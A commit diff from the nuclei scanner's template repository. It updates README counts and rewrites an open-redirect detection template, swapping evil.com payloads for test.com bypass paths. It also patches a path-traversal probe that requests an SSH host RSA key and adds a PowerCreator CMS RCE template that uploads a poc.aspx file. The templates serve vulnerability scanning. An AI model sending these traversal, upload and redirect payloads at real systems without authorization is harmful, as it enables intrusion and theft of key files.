commit
21f8a6c51f
|
@ -34,7 +34,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
| fuzzing | 4 | helpers | 2 |
|
| fuzzing | 4 | helpers | 2 |
|
||||||
| miscellaneous | 12 | misconfiguration | 43 |
|
| miscellaneous | 12 | misconfiguration | 43 |
|
||||||
| takeovers | 1 | technologies | 45 |
|
| takeovers | 1 | technologies | 45 |
|
||||||
| vulnerabilities | 81 | workflows | 18 |
|
| vulnerabilities | 82 | workflows | 18 |
|
||||||
|
|
||||||
|
|
||||||
**Tree structure of nuclei templates:**
|
**Tree structure of nuclei templates:**
|
||||||
|
@ -524,8 +524,8 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ │ ├── basic-cors.yaml
|
│ │ ├── basic-cors.yaml
|
||||||
│ │ ├── basic-xss-prober.yaml
|
│ │ ├── basic-xss-prober.yaml
|
||||||
│ │ ├── crlf-injection.yaml
|
│ │ ├── crlf-injection.yaml
|
||||||
│ │ ├── top-xss-params.yaml
|
│ │ ├── open-redirect.yaml
|
||||||
│ │ └── url-redirect.yaml
|
│ │ └── top-xss-params.yaml
|
||||||
│ ├── ibm
|
│ ├── ibm
|
||||||
│ │ ├── eclipse-help-system-xss.yaml
|
│ │ ├── eclipse-help-system-xss.yaml
|
||||||
│ │ └── ibm-infoprint-directory-traversal.yaml
|
│ │ └── ibm-infoprint-directory-traversal.yaml
|
||||||
|
@ -565,6 +565,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ │ ├── nginx-module-vts-xss.yaml
|
│ │ ├── nginx-module-vts-xss.yaml
|
||||||
│ │ ├── nuuo-nvrmini2-rce.yaml
|
│ │ ├── nuuo-nvrmini2-rce.yaml
|
||||||
│ │ ├── pdf-signer-ssti-to-rce.yaml
|
│ │ ├── pdf-signer-ssti-to-rce.yaml
|
||||||
|
│ │ ├── powercreator-cms-rce.yaml
|
||||||
│ │ ├── rce-shellshock-user-agent.yaml
|
│ │ ├── rce-shellshock-user-agent.yaml
|
||||||
│ │ ├── rce-via-java-deserialization.yaml
|
│ │ ├── rce-via-java-deserialization.yaml
|
||||||
│ │ ├── rconfig-rce.yaml
|
│ │ ├── rconfig-rce.yaml
|
||||||
|
@ -637,7 +638,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
**56 directories, 534 files**.
|
**56 directories, 535 files**.
|
||||||
|
|
||||||
📖 Documentation
|
📖 Documentation
|
||||||
-----
|
-----
|
||||||
|
|
|
@ -19,7 +19,7 @@ requests:
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Cache-Control: max-age=0
|
Cache-Control: max-age=0
|
||||||
|
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: open-redirect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Open URL redirect detection
|
||||||
|
author: afaq & @melbadry9 & @Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & @geeknik
|
||||||
|
severity: low
|
||||||
|
description: A user-controlled input redirect users to an external website.
|
||||||
|
tags: redirect
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/test.com/'
|
||||||
|
- '{{BaseURL}}/test.com//'
|
||||||
|
- '{{BaseURL}}///;@test.com'
|
||||||
|
- '{{BaseURL}}///test.com/%2F..'
|
||||||
|
- '{{BaseURL}}/////test.com'
|
||||||
|
- '{{BaseURL}}//test.com/%2F..'
|
||||||
|
- '{{BaseURL}}//test.com/..;/css'
|
||||||
|
- '{{BaseURL}}/test%E3%80%82com'
|
||||||
|
- '{{BaseURL}}/%5Ctest.com'
|
||||||
|
- '{{BaseURL}}test.com'
|
||||||
|
- '{{BaseURL}}/test.com'
|
||||||
|
- '{{BaseURL}}\test.com'
|
||||||
|
- '{{BaseURL}}//test.com/'
|
||||||
|
- '{{BaseURL}}\/\/test.com/'
|
||||||
|
- '{{BaseURL}}%00\/\/test.com/'
|
||||||
|
- '{{BaseURL}}/%00/test.com/'
|
||||||
|
- '{{BaseURL}}/%09/test.com/'
|
||||||
|
- '{{BaseURL}}/%0a/test.com/'
|
||||||
|
- '{{BaseURL}}/%0d/test.com/'
|
||||||
|
- '{{BaseURL}}////test.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}/%5ctest.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}@test.com'
|
||||||
|
- '{{BaseURL}}/{{BaseURL}}test.com'
|
||||||
|
- '{{BaseURL}}\{{BaseURL}}test.com'
|
||||||
|
- '{{BaseURL}}//{{BaseURL}}test.com/'
|
||||||
|
- '{{BaseURL}}\/\/{{BaseURL}}test.com/'
|
||||||
|
- '{{BaseURL}}%00\/\/{{BaseURL}}test.com/'
|
||||||
|
- '{{BaseURL}}////{{BaseURL}}test.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}/%5c{{BaseURL}}test.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}/〱{{BaseURL}}test.com/%2f%2e%2e'
|
||||||
|
- '{{BaseURL}}@{{BaseURL}}test.com'
|
||||||
|
- '{{BaseURL}}/?page=test.com&_url=test.com&callback=test.com&checkout_url=test.com&content=test.com&continue=test.com&continueTo=test.com&counturl=test.com&data=test.com&dest=test.com&dest_url=test.com&dir=test.com&document=test.com&domain=test.com&done=test.com&download=test.com&feed=test.com&file=test.com&host=test.com&html=test.com&http=test.com&https=test.com&image=test.com&image_src=test.com&image_url=test.com&imageurl=test.com&include=test.com&langTo=test.com&media=test.com&navigation=test.com&next=test.com&open=test.com&out=test.com&page=test.com&page_url=test.com&pageurl=test.com&path=test.com&picture=test.com&port=test.com&proxy=test.com&redir=test.com&redirect=test.com&redirectUri=test.com&redirectUrl=test.com&reference=test.com&referrer=test.com&req=test.com&request=test.com&retUrl=test.com&return=test.com&returnTo=test.com&return_path=test.com&return_to=test.com&rurl=test.com&show=test.com&site=test.com&source=test.com&src=test.com&target=test.com&to=test.com&uri=test.com&url=test.com&val=test.com&validate=test.com&view=test.com&window=test.com&redirect_to=test.com'
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?test\.com(?:\s*?)$'
|
||||||
|
part: header
|
|
@ -1,28 +0,0 @@
|
||||||
id: open-redirect
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Open redirect Detection
|
|
||||||
author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & geeknik
|
|
||||||
severity: low
|
|
||||||
description: A user-controlled input redirect users to an external website.
|
|
||||||
tags: redirect
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/evil.com/"
|
|
||||||
- "{{BaseURL}}/evil.com//"
|
|
||||||
- "{{BaseURL}}///;@evil.com"
|
|
||||||
- "{{BaseURL}}///evil.com/%2F.."
|
|
||||||
- "{{BaseURL}}/////evil.com"
|
|
||||||
- "{{BaseURL}}//evil.com/%2F.."
|
|
||||||
- "{{BaseURL}}//evil.com/..;/css"
|
|
||||||
- "{{BaseURL}}/evil%E3%80%82com"
|
|
||||||
- "{{BaseURL}}/%5Cevil.com"
|
|
||||||
- "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&langTo=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri=evil.com&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com"
|
|
||||||
matchers:
|
|
||||||
- type: regex
|
|
||||||
regex:
|
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
|
|
||||||
part: header
|
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: powercreator-cms-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PowerCreator CMS RCE
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/
|
||||||
|
tags: rce,powercreator
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 225
|
||||||
|
Content-Disposition: form-data;name="file1";filename="poc.aspx";
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
|
||||||
|
|
||||||
|
-----------------------------20873900192357278038549710136
|
||||||
|
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
|
||||||
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
|
Poc_Test
|
||||||
|
-----------------------------20873900192357278038549710136--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /ResourcePic/{{endpoint}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: endpoint
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "(.*?.ASPX)"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains(body, 'Poc_Test') == true && status_code == 200"
|
Loading…
Reference in New Issue